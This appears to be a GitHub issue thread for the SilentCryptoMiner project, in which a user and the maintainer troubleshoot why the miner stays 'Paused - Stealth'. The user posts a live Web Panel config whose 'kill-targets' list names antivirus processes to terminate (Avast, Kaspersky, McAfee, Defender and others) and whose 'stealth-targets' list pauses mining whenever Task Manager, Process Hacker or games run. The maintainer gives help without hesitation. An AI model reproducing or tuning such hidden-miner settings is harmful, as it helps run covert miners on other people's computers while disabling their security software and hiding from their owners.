### ISSUE TITLE
Paused - Stealth (But Stealth is disabled in the config)

### ISSUE THREAD

**Issue by LokeYourLord** [UnamSanctam/SilentCryptoMiner#100]
As the title says. A rig of mine is built with a miner that has in the beginning "Stealth" set to true (when compiled), but when I apply a Web Panel config with the` "stealth-targets": "", `set to empty, it still stays on "Paused - Stealth" for no reason.
![image](https://user-images.githubusercontent.com/5807595/143531561-13a29da0-b5d4-4232-8bed-ff42fbb22bb3.png)

Here is the config that I use from the Web Panel:

```
{
    "url": "stratums://0x5860FBA14b65@eth-eu1.nanopool.org:9433/{COMPUTERNAME}/myprivatemail%40gmail.com",
    "algo": "ethash",
    "max-gpu": 30,
    "idle-wait": 1,
    "idle-gpu": 50,
    "stealth-targets": "",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}
```

**Comment by UnamSanctam** [comment]
Yes it currently does that since in that instance the option is empty though in future versions it will clear it whenever it's empty (didn't do that since some said that they were having problems before but it turned out that their issue was with their settings), just do `"stealth-targets": "exampleprogram.exe",` and it will pause for that (no program is called that)

**Comment by LokeYourLord** [comment]
That sounds good, but there's another problem. The rig had been running a program I added to the "stealth-targets" list, but I removed ONLY that program from that list. However, the issue still persisted.

My list looks like this now:
`    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,Fallout4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,GenshinImpact.exe",`

I had removed "Adobe Premiere Pro.exe" from that list. Shouldn't it update then and run without it in that list?

**Comment by LokeYourLord** [comment]
I mean I guess that the rig is likely running another program from that Stealth list that I am not aware of (even though I can see all processes running on that rig).

**Comment by UnamSanctam** [comment]
Yes every time it connects it gets the new config (every minute), run your JSON through a JSON validator as well to see that it's correct.

**Comment by LokeYourLord** [comment]
Got DevTools for W11 so I'ma use that JSON Validator there. But again, it is still just "Paused" even with the program that the rig is running removed.

Last question: Is there a list of all values for the config somewhere? All of the values like "worker", "stealth", "stealth-targets", etc etc?

**Comment by UnamSanctam** [comment]
Great, the values in the wiki should be all of them.
